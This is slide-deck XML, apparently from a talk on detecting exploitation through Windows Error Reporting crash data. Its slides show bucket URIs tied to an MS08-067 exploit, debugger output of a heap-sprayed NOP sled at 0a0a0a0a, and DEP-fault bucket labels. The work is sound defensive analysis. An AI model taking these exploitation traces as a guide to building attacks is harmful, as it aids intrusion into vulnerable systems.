          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1688579" y="5611084"/>
            <a:ext cx="1045829" cy="4482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1C889B-EEA3-4279-BC1C-8DAE9A1F4C3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="86708" y="1262640"/>
            <a:ext cx="11877629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/BEX/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1961" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dns_exe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/5_2_3790_172/470c3339/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1961" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dns_exe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/5_2_3790_172/00012082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/c0000409.htm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4EE1B4-6520-4118-AAE7-1E8274EDD13A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2775982" y="1785553"/>
            <a:ext cx="6947292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Segoe UI"/>
              </a:rPr>
              <a:t>Some unknown stack buffer overrun triggering /GS code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Bent Arrow 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90410EAA-799E-48E7-9AD5-EA6AF3843B87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1655451" y="1636150"/>
            <a:ext cx="1045829" cy="4482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E4D1EB-E090-4F99-80B7-DC1668A48A14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="181643" y="3242244"/>
            <a:ext cx="11802927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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1961" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>svchost_exe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/5_1_2600_3264/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1961" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NETAPI32_dll/5_1_2600_3264/00018ae1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1961" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.htm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FC119C-45C1-4BC2-B4D0-E5CA7E3BFBE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2796216" y="3765157"/>
            <a:ext cx="5677357" cy="39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961" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>MS08-067 Exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Bent Arrow 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40CECA6A-8B28-46BF-A98B-133ADAADFBD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1675685" y="3615753"/>
            <a:ext cx="1045829" cy="4482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505050"/>
              </a:solidFill>
              <a:latin typeface="Segoe U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EDCFB-C5DD-4C4D-BFB7-89F8F5CE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27" y="282174"/>
            <a:ext cx="833093" cy="8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 animBg="1"/>
      <p:bldP spid="42" grpId="0"/>
      <p:bldP spid="43" grpId="0"/>
      <p:bldP spid="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C972-C175-4E0E-ABC3-A1C2446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Error Reporting: Bucketing Level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CE198-E179-48F0-8337-DE355428530A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496494" y="1441359"/>
            <a:ext cx="4342784" cy="5104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C3611-E0B1-48DA-8D91-4D2B31A1DA47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1563142" y="1593736"/>
            <a:ext cx="3047568" cy="3047568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>
              <a:solidFill>
                <a:srgbClr val="505050"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI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57B573AE-CBDF-43C9-90A9-2825C565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17842"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="504514" y="6197168"/>
            <a:ext cx="4334764" cy="33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CC0145C-E5BA-4B42-A8C6-F0580C06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281" y="1797164"/>
            <a:ext cx="2647291" cy="264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B142027B-C5EC-4FD8-8C05-89A6722D6E21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4631683" y="1441359"/>
            <a:ext cx="1195233" cy="4079299"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 49074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F84B8-3B8C-4627-A57D-D5D0B9A827E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5573086" y="1593736"/>
            <a:ext cx="5602655" cy="37836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Loaded Modules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Crashing address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Call stack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PEB/TEB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Stack and Heap Memory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Command Line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="336145" indent="-336145" defTabSz="914367">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc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3137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Threads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9E959B-E563-4303-A270-9B04E1DB6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933" y="157548"/>
            <a:ext cx="1088510" cy="11643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1F605A-D84D-4252-9CF6-B269EDF87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4" y="1636151"/>
            <a:ext cx="857482" cy="7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5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B158-D268-42DD-BB0D-CB7BB10E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Error Reporting: Labeling Level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53580-131A-4FDC-8750-49C355D53742}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="194536" y="1262640"/>
            <a:ext cx="9487163" cy="5793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367"/>
            <a:r>
              <a:rPr lang="en-US" sz="2745" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jscript!JsEval+0x110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jscript!NatFncObj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::Call+0x41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jscript!NameTbl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::InvokeInternal+0xe0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jscript!VAR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::InvokeByDispID+0xd4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jscript!CScriptRuntime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::Run+0x16c9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jscript!ScrFncObj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::Call+0x8d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jscript!CSession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::Execute+0xa1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jscript!COleScript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::ExecutePendingScripts+0x147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jscript!COleScript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::ParseScriptText+0x2b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914367"/>
            <a:r>
              <a:rPr lang="en-US" sz="2745" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jscript!COleScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2745" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>::ParseScriptTextCore+0x243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mshtml!CScriptCollection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::ParseScriptText+0x240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mshtml!CScriptElement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::Execute+0xc0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mshtml!CHtmParse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::Execute+0x43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mshtml!CHtmPost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::Broadcast+0x11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mshtml!CHtmPost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::Exec+0x40d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mshtml!CHtmPost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::Run+0x13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mshtml!PostManExecute+0xdc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mshtml!PostManResume+0x9e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mshtml!CHtmPost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::OnDwnChanCallback+0x10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mshtml!GlobalWndProc+0x181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user32!DispatchMessageW+0xf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914367"/>
            <a:r>
              <a:rPr lang="en-US" sz="1372" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ieframe!CTabWindow</a:t>
            </a:r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::_TabWindowThreadProc+0x189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kernel32!BaseThreadInitThunk+0xe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914367"/>
            <a:r>
              <a:rPr lang="en-US" sz="1372" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ntdll!_RtlUserThreadStart+0x23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914367"/>
            <a:endParaRPr lang="en-US" sz="1372" dirty="0">
              <a:solidFill>
                <a:srgbClr val="505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09E26CA-C861-41FE-A47D-321E7E3EC91A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4938118" y="1038534"/>
            <a:ext cx="3735103" cy="745465"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -67939"/>
              <a:gd name="adj2" fmla="val 210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ln w="0"/>
                <a:solidFill>
                  <a:srgbClr val="505050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</a:rPr>
              <a:t>JavaScript was executing eval()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FDA2CD2-1012-48CB-8426-9BE64302E857}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5573086" y="2373001"/>
            <a:ext cx="3735103" cy="745465"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -54672"/>
              <a:gd name="adj2" fmla="val 972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ln w="0"/>
                <a:solidFill>
                  <a:srgbClr val="505050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</a:rPr>
              <a:t>IE was running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3575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405" y="1295703"/>
            <a:ext cx="4342784" cy="510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/>
          <a:srcRect r="17842"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1837426" y="6051512"/>
            <a:ext cx="4334764" cy="33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Execute Protection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379" y="1371893"/>
            <a:ext cx="441897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0:010&gt; .exr -1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ExceptionAddress: 0a0a0a0a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   ExceptionCode: c0000005 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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(SOFTWARE_NX_FAULT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914367"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   Access violation)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  ExceptionFlags: 00000001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NumberParameters: 1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   Parameter[0]: 00000008</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914367"/>
            <a:endParaRPr lang="pt-BR" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="505050"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRP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0:010&gt; u 0a0a0a0a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0a0a0a0a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0a0a0a0b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0a0a0a0c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0a0a0a0d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0a0a0a0e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0a0a0a0f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0a0a0a10 90              nop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914367"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0a0a0a11 90              nop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="505050"/>
              </a:solidFill>
              <a:latin typeface="Consolas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896054" y="1448081"/>
            <a:ext cx="3047568" cy="3047568"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="571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>
              <a:solidFill>
                <a:srgbClr val="505050"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI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3587" y="1524271"/>
            <a:ext cx="827198" cy="91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432" y="3505189"/>
            <a:ext cx="990459" cy="838081"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Rectangle 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048432" y="4038513"/>
            <a:ext cx="990459" cy="3047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400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t> code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24622" y="1600460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24622" y="205759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24622" y="251473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124622" y="297186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24622" y="342900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657946" y="1600460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657946" y="205759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57946" y="251473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657946" y="297186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57946" y="342900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191270" y="1600460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191270" y="205759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91270" y="297186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191270" y="342900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724595" y="1600460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724595" y="205759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24595" y="251473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724595" y="297186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724595" y="342900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919" y="1600460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57919" y="205759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257919" y="251473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257919" y="2971865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257919" y="342900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7" name="Title 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1067136"/>
            <a:ext cx="4342784" cy="1417436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pPr algn="ctr" defTabSz="914225">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="505050"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI Ligh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91270" y="2514731"/>
            <a:ext cx="457135" cy="3809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14367"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>0101 0101</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Explosion 1 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3277000" y="3886136"/>
            <a:ext cx="228568" cy="228568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7"/>
            <a:endParaRPr lang="en-US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9218" name="Picture 2" descr="http://support.microsoft.com/library/images/support/kbgraphics/public/EN-US/IE5x_NewErrorReportingDialog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865" y="1829027"/>
            <a:ext cx="2830077" cy="1904730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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BD7292F-B754-4C6A-B0BA-9B6D91DD7667}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8975093" y="428238"/>
            <a:ext cx="2988083" cy="899537"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -39581"/>
              <a:gd name="adj2" fmla="val 135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ln w="0"/>
                <a:solidFill>
                  <a:srgbClr val="505050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</a:rPr>
              <a:t>Data Execute Protection violation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DB03581-0C8A-4E93-8C48-F0DFF737DBA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9756402" y="3818274"/>
            <a:ext cx="2016956" cy="899537"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -61541"/>
              <a:gd name="adj2" fmla="val 398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ln w="0"/>
                <a:solidFill>
                  <a:srgbClr val="505050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</a:rPr>
              <a:t>…filled with a NOP sled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6B710B6-9994-4A7B-BB40-244E72CA79F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9756402" y="2737897"/>
            <a:ext cx="2016956" cy="899537"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -115413"/>
              <a:gd name="adj2" fmla="val 882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ln w="0"/>
                <a:solidFill>
                  <a:srgbClr val="505050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/>
              </a:rPr>
              <a:t>Crash site not in loaded module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D7474FC6-114A-4C17-9EC8-F76405B02A46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6096001" y="5114097"/>
            <a:ext cx="5620500" cy="1306310"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -13447"/>
              <a:gd name="adj2" fmla="val -4617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67"/>
            <a:r>
              <a:rPr lang="en-US" sz="2353" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Bucketed as: SOFTWARE_NX_FAULT_ FILL_PATTERN_90909090_ NXCODE_c0000005_&lt;faulting symbol&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3661906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9.46102E-7 C -0.00574 -0.1152 -0.01147 -0.23017 0.00676 -0.26278 C 0.02499 -0.2954 0.06718 -0.24543 0.10954 -0.19547 " pathEditMode="relative" ptsTypes="aaA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6" grpId="0" animBg="1"/>
      <p:bldP spid="106" grpId="1" animBg="1"/>
      <p:bldP spid="39" grpId="0" animBg="1"/>
      <p:bldP spid="40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F946-2BFE-4432-BE40-BEAF887C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dirty="0" err="1"/>
              <a:t>Heapspray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> through 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EBAD3-DE12-47D3-9B25-05A0878B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4809" y="2723998"/>
            <a:ext cx="3809805" cy="380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457D8-8FDF-4262-80AD-3FDD46E8FCFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6320106" y="1169262"/>
            <a:ext cx="3884508" cy="5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3137" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Heapsprayed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3137" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t> crash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538523-B5C7-45A5-9867-697F7F29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2684" y="2738005"/>
            <a:ext cx="3875898" cy="38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2B0520-9428-4854-A1B3-09F702E826A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1912684" y="1183269"/>
            <a:ext cx="3884508" cy="1056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3137" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Random normal crash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23475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3685-953E-405D-A845-BDBA3972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Error Reporting: Bucketing Level One</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 51" descr="XP icon user accounts">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21CC8C04-0360-4758-8958-7E7665C8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493" y="1412044"/>
            <a:ext cx="383042" cy="31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0">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA847287-B8E1-4997-B90E-A3D31E5DBF41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-233444" y="487"/>
            <a:ext cx="9412461" cy="112053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endParaRPr lang="en-US" sz="3529" spc="-1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latin typeface="Segoe UI Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 17" descr="PC with flat panel">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E8005A0-6D7E-4B74-BFB4-7808663B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407" y="1262640"/>
            <a:ext cx="450750" cy="532668"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 14" descr="3-01545_attack">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFD7ADC7-EB8D-429F-A0F5-0E01CD4F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8513" y="1412044"/>
            <a:ext cx="478948" cy="4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iped Right Arrow 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C308CF1-C71D-4551-90F0-CE6B5557E3C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3929640" y="1377160"/>
            <a:ext cx="3137487" cy="323709"/>
          </a:xfrm>
          <a:prstGeom prst="stripedRight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F1B30-DC1B-43C0-A0FB-25B2CBE76861}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1240365" y="4381393"/>
            <a:ext cx="8441334" cy="452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67"/>
            <a:r>
              <a:rPr lang="en-US" sz="2353" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>GET http://watson.microsoft.com with the following URI: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60E5F86-C9DD-4D73-A549-06D13046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0301" y="2009661"/>
            <a:ext cx="4780932" cy="21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4" descr="3-01545_attack">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7049A437-239E-4CB7-9184-94E453540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640" y="3653106"/>
            <a:ext cx="448212" cy="42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Bent Arrow 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91517710-7215-428B-B7A9-88516F4E5326}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="7365935" y="3578404"/>
            <a:ext cx="2502519" cy="1344637"/>
          </a:xfrm>
          <a:prstGeom prst="bentArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16176"/>
              <a:gd name="adj2" fmla="val 23897"/>
              <a:gd name="adj3" fmla="val 25735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CB282-7AEF-451B-84ED-69D01018AECF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8299711" y="1121018"/>
            <a:ext cx="1568743" cy="90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US" sz="1765" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Windows Error Reporting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Picture 19" descr="Server">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7F1065A-3FC9-4222-B2E5-26CCA4DF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3962" y="1223040"/>
            <a:ext cx="493468" cy="75307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ADA6B9-0579-46B9-B0D3-170B1F7883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658" y="1252318"/>
            <a:ext cx="1008478" cy="6816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1E5B936-1CF6-4B7B-B96C-82D3E9923574}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270795" y="4966812"/>
            <a:ext cx="12772497" cy="362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/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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765" dirty="0" err="1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svchost_exe</a:t>
            </a:r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/5_1_2600_3264/470c3339/NETAPI32_dll/5_1_2600_3264/470c3339/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>c0000005/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1765" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00018ae1.htm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangular Callout 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80DE8716-7985-43A0-AC0C-D79D8AECA92B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
